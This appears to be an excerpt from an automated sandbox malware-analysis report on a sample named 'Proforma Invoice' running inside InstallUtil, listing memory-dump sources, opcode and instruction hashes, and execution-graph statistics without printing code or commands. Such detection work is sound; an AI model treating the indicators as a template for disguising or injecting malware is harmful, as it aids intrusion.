                                                                                          • Opcode Fuzzy Hash: 6ae1f7be6fd0112b7e483bea41b9b4faa6c7890b1252ffce5e9eece34581536d
                                                                                          • Instruction Fuzzy Hash: CA1123B5D0425DCBDF04CF9AD8856EEBBF6FB8A315F10802AD504B3210D7745A85CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453359666.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_83d000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                          • Instruction ID: 54f4d6c3c5c4ae6df5286174a312bca9eb26a0dcf368550830a57296b1e4fda8
                                                                                          • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                          • Instruction Fuzzy Hash: DE11D376504380DFCB16CF10D5C4B16BF71FB94314F24C6A9D8494B656C33AD85ACBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 25df62792553cf2aafaf2ddbfc66e06559eff30918ba84184bba3062f76209d1
                                                                                          • Instruction ID: 4bdb52b4427e0ce23c74c112a77d10960106b202717e09a1c137f7dc3b635bd9
                                                                                          • Opcode Fuzzy Hash: 25df62792553cf2aafaf2ddbfc66e06559eff30918ba84184bba3062f76209d1
                                                                                          • Instruction Fuzzy Hash: 3B21E478A00229CFDB65DF28D998AD9B7B1FB48304F1181E9D918E7345DB749EC58F40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453394339.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_84d000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6378273382ad61b692e8e45ce1cce0bbd419bee2ae48a67450022ee3627af51c
                                                                                          • Instruction ID: dec6fc89c3064de98c28dcd7425f221bb6fe490ab1778dad1e1f97c571d4e960
                                                                                          • Opcode Fuzzy Hash: 6378273382ad61b692e8e45ce1cce0bbd419bee2ae48a67450022ee3627af51c
                                                                                          • Instruction Fuzzy Hash: 60118E76504684DFCB16DF14D9C4B16FF62FB84314F24C6AAD8094B656C33AD81ACBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 73f5fd3c1883d71c06f8e850aa13c4917b86e21e3cd96fe1e9a5f598e634e169
                                                                                          • Instruction ID: e919161dd396b9f98adb869c30b752e955d3fcb50c6bed348fd8f85fe0b8b211
                                                                                          • Opcode Fuzzy Hash: 73f5fd3c1883d71c06f8e850aa13c4917b86e21e3cd96fe1e9a5f598e634e169
                                                                                          • Instruction Fuzzy Hash: 99E0E5B4E04208EFCB84EFA8D5406ACBBF8EB48300F10C0E9C81993341D7319A02CF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 73f5fd3c1883d71c06f8e850aa13c4917b86e21e3cd96fe1e9a5f598e634e169
                                                                                          • Instruction ID: 6199c8862c2631ce5d811666986f97e86ee10656ffbb66e7b3379d73ee029355
                                                                                          • Opcode Fuzzy Hash: 73f5fd3c1883d71c06f8e850aa13c4917b86e21e3cd96fe1e9a5f598e634e169
                                                                                          • Instruction Fuzzy Hash: 4EE0E574E05208EFCB84EFA8D5406ACBBF8FB48300F14C0E9881897341E6319E02CF81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f4786ca8aed6aa90f5674299960314437aa151ce023ef26528fa1bb33a54f68e
                                                                                          • Instruction ID: 91041c9d237c81371fd21deabadf0d79ac662f314876b92351c5e474c13ca86e
                                                                                          • Opcode Fuzzy Hash: f4786ca8aed6aa90f5674299960314437aa151ce023ef26528fa1bb33a54f68e
                                                                                          • Instruction Fuzzy Hash: 37E0C974D08208EFC744DFA8D544AACBBF4FB49300F1080A9981893341D6319A02DB41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b680939138cafe2a6307696c4212c4fc5d95543f5d316ba045a4b22f11283bce
                                                                                          • Instruction ID: cecdf602e75ce5f123c64f2361cf116112d67139f21d4728969f4a237373271d
                                                                                          • Opcode Fuzzy Hash: b680939138cafe2a6307696c4212c4fc5d95543f5d316ba045a4b22f11283bce
                                                                                          • Instruction Fuzzy Hash: 44E0DF74808218ABC710CF94D90096CBFB8FB56304F208099D80893351C6319A02DB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 94dab061ce17172cd691cd75b5bcce3246622dff8cdfbb471605b7e1a9856be5
                                                                                          • Instruction ID: c7894bd53b485dd28477500adae56b32350f06be8e9dd3198b61562d174fb020
                                                                                          • Opcode Fuzzy Hash: 94dab061ce17172cd691cd75b5bcce3246622dff8cdfbb471605b7e1a9856be5
                                                                                          • Instruction Fuzzy Hash: A5E04F74D08208EFCB44DF98D5416BCFFB8EB49200F1480E9C85957381C6319A02DB84
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 987bce076d010543d4890352ac77067e7d67792ffa07bac2c3750e93c0410705
                                                                                          • Instruction ID: c7ec486874a6140b8d0139851a440440420577599d64bd1b11c8fcb058629977
                                                                                          • Opcode Fuzzy Hash: 987bce076d010543d4890352ac77067e7d67792ffa07bac2c3750e93c0410705
                                                                                          • Instruction Fuzzy Hash: 72E08674908208EBC704DF94E9409ACBFF9FB45310F10909DDC0413391C7319E52DB84
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f45c3d9dc7974876caaf4e14db40b2f2adc6544b3f96b63eaff1c1f0bc35987
                                                                                          • Instruction ID: 16b068633fd230cfc0e47e847e5bfb0ce10afc7bcfe99102b594e5e3c897392e
                                                                                          • Opcode Fuzzy Hash: 5f45c3d9dc7974876caaf4e14db40b2f2adc6544b3f96b63eaff1c1f0bc35987
                                                                                          • Instruction Fuzzy Hash: 13E08C71804208DFD740EFE4C90469A7BB8EB06211F0001A5E40993250EF315A00D7A5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d6c29c96c7e62e18942949512966d703d6436895528b214c6b0a83a24e4467b1
                                                                                          • Instruction ID: 81e3c1643821f6154e3eb64df344b556294eb670c37f288d21c1a50382aadfb8
                                                                                          • Opcode Fuzzy Hash: d6c29c96c7e62e18942949512966d703d6436895528b214c6b0a83a24e4467b1
                                                                                          • Instruction Fuzzy Hash: C3E01274D09208DFD754EF94D94156CBFB9FB46315F2081D9C80917351C7319E46DB85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 857adc1836722b57549c932258d411813fb49c8eded1b74e24ec3a36ad66d7b6
                                                                                          • Instruction ID: 551d4c661c863eeecbdbe64f3c28d8bc2e75b37829a9ebd81db52846e341cb2e
                                                                                          • Opcode Fuzzy Hash: 857adc1836722b57549c932258d411813fb49c8eded1b74e24ec3a36ad66d7b6
                                                                                          • Instruction Fuzzy Hash: 7FE012B1C05108EFC790FFF9C90066E7FF9EB46210F5105E5A50597251EA314A04D796
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 74bcfcfe6be95681bc399a690e932b76861157d41a6d8e14b72265f0bbafbcf9
                                                                                          • Instruction ID: b33ca204378d42d62b5285526bd57ad52ae5166e41b6996dd3ed87920ee74846
                                                                                          • Opcode Fuzzy Hash: 74bcfcfe6be95681bc399a690e932b76861157d41a6d8e14b72265f0bbafbcf9
                                                                                          • Instruction Fuzzy Hash: A1E0EC74909208DBC704DB94E9419ACBBB9BB45315F2095D9C81917391D6319E42DB85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 74bcfcfe6be95681bc399a690e932b76861157d41a6d8e14b72265f0bbafbcf9
                                                                                          • Instruction ID: 09df69920a979b213444ffbe6313b28c534dc0205bf91cc65128f255ff8a9a7f
                                                                                          • Opcode Fuzzy Hash: 74bcfcfe6be95681bc399a690e932b76861157d41a6d8e14b72265f0bbafbcf9
                                                                                          • Instruction Fuzzy Hash: 20E0C274D08208EBC704DF94E9409ACBFB8FB45305F2090DCC80827391CB329E02CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e8a2eb9ceec923b87d98cafa0a8d79a8cfae1f7c7ebd2a82758c07f340b0460
                                                                                          • Instruction ID: a911181741cedb60ecf12392c03d5efe726e2a655cafddd3d7b9c6dd483e63ac
                                                                                          • Opcode Fuzzy Hash: 3e8a2eb9ceec923b87d98cafa0a8d79a8cfae1f7c7ebd2a82758c07f340b0460
                                                                                          • Instruction Fuzzy Hash: 95E08C34808208DFC704DBA8D54476CBFB8BB45201F1080D9C84853391D631DA06CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bcf515542608614582ae36a57760fe03a9bb66eec784a56968b3a4d1dace3176
                                                                                          • Instruction ID: 63ccc92c79af8a4916e981c416dfbe114b1e961474ebac3a6b127ea60dfe4338
                                                                                          • Opcode Fuzzy Hash: bcf515542608614582ae36a57760fe03a9bb66eec784a56968b3a4d1dace3176
                                                                                          • Instruction Fuzzy Hash: E2D01230A0110CEF8B00DFB8E95165D77B5FB45210B1041A99508D7210EA315F049B81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 33d3030a2d7933826c8033b41792c3dc00229e821b72d7e7a0597671cfd84062
                                                                                          • Instruction ID: 17a941d5c7d66e9ddf3a5b60e030d5deaeffb86b6da0ef04c349c0145b167a4e
                                                                                          • Opcode Fuzzy Hash: 33d3030a2d7933826c8033b41792c3dc00229e821b72d7e7a0597671cfd84062
                                                                                          • Instruction Fuzzy Hash: 36D0C73354632867D63555A65C01F96771C9B15BA1F054066FB046F78081B17940D7D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d535cc24979fe8e178b1224fd2769f951da17df4c8502cb7e7e14abc5253b26a
                                                                                          • Instruction ID: fc7045f5768c4909d952667d682805551cb63d30ec7ef9de01beafdbfa23397e
                                                                                          • Opcode Fuzzy Hash: d535cc24979fe8e178b1224fd2769f951da17df4c8502cb7e7e14abc5253b26a
                                                                                          • Instruction Fuzzy Hash: 7CD05E70608209CFD3119B28D49CB6A7AA2FB49308F2444D9A06DCB286CF754A869B56
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1cf4fae0d3f6b8e371bfe3b22a98a62831e1d85585a74ee44709edbdcb57296f

                                                                                          Execution Graph

                                                                                          Execution Coverage:13%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:51
                                                                                          Total number of Limit Nodes:7


                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 05E6E86F

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 05E6E86F

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9bda644632aa9dcca61c7e155ba0cb8b9f248454e405b357e2475ed44031281d
                                                                                          • Instruction ID: b290c94161d64f5ad6fd50dfca205e101c8ad2efea16ccd82b535cf7f9aa0a52
                                                                                          • Opcode Fuzzy Hash: 9bda644632aa9dcca61c7e155ba0cb8b9f248454e405b357e2475ed44031281d
                                                                                          • Instruction Fuzzy Hash: 4C128F347002029BDB16AB38E49936D73E3EBCA355B209D78E855CB395DF31DD468781

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e068452a3501bba281094f3a2a132c05b90e2843f77d815076d58b9abdeb5791
                                                                                          • Instruction ID: fe992d323bac6808ee8b0686434c607bb1be43cab9e3cb63d0d6d5c22f55b5fb
                                                                                          • Opcode Fuzzy Hash: e068452a3501bba281094f3a2a132c05b90e2843f77d815076d58b9abdeb5791
                                                                                          • Instruction Fuzzy Hash: 04E18E34B002058FDB54DB68D494AADB7F2FBC9310F2484A9E51AEB395DB31DD46CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 881de0f5cfeb2fc9a1b5ade4b2254b8a8c8b96d9e3a65f8acbe769b2461b7e88
                                                                                          • Instruction ID: bb239be1736642fcb2708f358fc53e6ec1d0defccd46270dfa307a47ce06a025
                                                                                          • Opcode Fuzzy Hash: 881de0f5cfeb2fc9a1b5ade4b2254b8a8c8b96d9e3a65f8acbe769b2461b7e88
                                                                                          • Instruction Fuzzy Hash: 3FB14970E10219CFDB10CFA9C8857AEBBF1EF88305F14C169E829A7394EB749845CB85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 30843ea533d81767c7f5cfbe46d9b5698c1486f0208a488e51717be0cbebdcde
                                                                                          • Instruction ID: 2f16da830bdfc0baffd8f8cafe98499acbdd81b58d7e7853584451e7dbe19026
                                                                                          • Opcode Fuzzy Hash: 30843ea533d81767c7f5cfbe46d9b5698c1486f0208a488e51717be0cbebdcde
                                                                                          • Instruction Fuzzy Hash: 70A15970E002098FDB20CFA8D89579DBBF1EF88715F24C569D869AB394EB749845CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 942da24cd79959c7f9066783740bbdb6ee800ff29b46cd9668176bbe9d7142c2
                                                                                          • Instruction ID: 53c997aba038a40e2fc4553be4c05d33d05ea0d2a96100e587c6885031795a49
                                                                                          • Opcode Fuzzy Hash: 942da24cd79959c7f9066783740bbdb6ee800ff29b46cd9668176bbe9d7142c2
                                                                                          • Instruction Fuzzy Hash: 61915C70E00209CFDB10CFA9C9857EEBBF1EF88714F14C169E429AB294DB749985CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a90a159342cee4d3e72ebb5633d37689899eea355bd7d35bbefb25a6ed833b7d
                                                                                          • Instruction ID: acfd797e6d215ba3da52cc8e4d62414bc14f7d386b544f95f6d3649040e39aad
                                                                                          • Opcode Fuzzy Hash: a90a159342cee4d3e72ebb5633d37689899eea355bd7d35bbefb25a6ed833b7d
                                                                                          • Instruction Fuzzy Hash: DD81AC71A002058FDB54DFA9D884B9DBBF5FF88310F14C1A9EA18AB395EB709D05CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ba4c639e9ff0d189b27ed74e92329c6474cbc8e812d97bacb04690803f8ab278
                                                                                          • Instruction ID: 8513b3e112dda0a9eaf827675f6aad128cd9e565edb93213259f0193d2d7fcd0
                                                                                          • Opcode Fuzzy Hash: ba4c639e9ff0d189b27ed74e92329c6474cbc8e812d97bacb04690803f8ab278
                                                                                          • Instruction Fuzzy Hash: 5F5190347046448FCB14EB78D458AAE7BF2FF89754F2080A9E41AEB3A1DA75DC01CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e8c276f4adbcdd819223886c08804c38db7d579ce13457ffd92163acf33cb18
                                                                                          • Instruction ID: 5189dab988ed5e53b7fe337e1c3ac42904f512ab9e1d3134ea386fd0f9b3d783
                                                                                          • Opcode Fuzzy Hash: 4e8c276f4adbcdd819223886c08804c38db7d579ce13457ffd92163acf33cb18
                                                                                          • Instruction Fuzzy Hash: C6518330105683CFD706EF7CF8645963FB2EBD730470549EAD1544B2BAEB60990ACB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 942f64722bd683599abb0d8989b1cde57bb4b0a80204b2f0ea62a68e590669e1
                                                                                          • Instruction ID: 0a193b857f1059720e4aab857ff52bf016bbbd3d2e5b8b9d319706a27630845f
                                                                                          • Opcode Fuzzy Hash: 942f64722bd683599abb0d8989b1cde57bb4b0a80204b2f0ea62a68e590669e1
                                                                                          • Instruction Fuzzy Hash: 44511174E106188FDB28CFA9C885B9DBBF1FF48300F14856AE829BB351C774A844CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3deb1e5c78b1a77380746ae24e7c0552c55acec61ba7cb69e0643ee6d7e70c12
                                                                                          • Instruction ID: ea492077c021bf08db97be34bb689609e175afbd247ceb94def2491e7305e744
                                                                                          • Opcode Fuzzy Hash: 3deb1e5c78b1a77380746ae24e7c0552c55acec61ba7cb69e0643ee6d7e70c12
                                                                                          • Instruction Fuzzy Hash: 96511474E106188FDB28CFA9C885B9DBBF1FF48310F14856AE829BB351D774A844CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b73eefd719ba0de2ac0b392c0bf6a98c7ce9aa01e9ab925f07b5323253361039
                                                                                          • Instruction ID: af21a02265c69971f7d5c6c5be8d6aec60ae2c94744e478e1706545e810d07c3
                                                                                          • Opcode Fuzzy Hash: b73eefd719ba0de2ac0b392c0bf6a98c7ce9aa01e9ab925f07b5323253361039
                                                                                          • Instruction Fuzzy Hash: 29412030105583CFD706EF68F8989963FB3FBDA30530459E9D1145B2BAE7A0A80ADB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bd38a0750d6f8c7d4b66f7813b21818f181645b57769f6b5d2b833819750954d
                                                                                          • Instruction ID: 6f4d15931380488438e20438925e8742667f89d61206f9fe81cfac16ac258a8d
                                                                                          • Opcode Fuzzy Hash: bd38a0750d6f8c7d4b66f7813b21818f181645b57769f6b5d2b833819750954d
                                                                                          • Instruction Fuzzy Hash: 60319F30E44249CFDB15CFA4D8447AEB7F6EF89304F2088A5E429EB290DBB09C81CB40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 29e819e1fe214aed16c40c754b6ebf692c134f389282b6c32f345a08d0be7c7d
                                                                                          • Instruction ID: 09aa3d0c7ead294139867eef4ee196e4a298b07cc1b1183910df520aaf287073
                                                                                          • Opcode Fuzzy Hash: 29e819e1fe214aed16c40c754b6ebf692c134f389282b6c32f345a08d0be7c7d
                                                                                          • Instruction Fuzzy Hash: 52411070D00349DFDB14CFA9C985ADEBBF5FF48700F108069E819AB250DB75A946CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
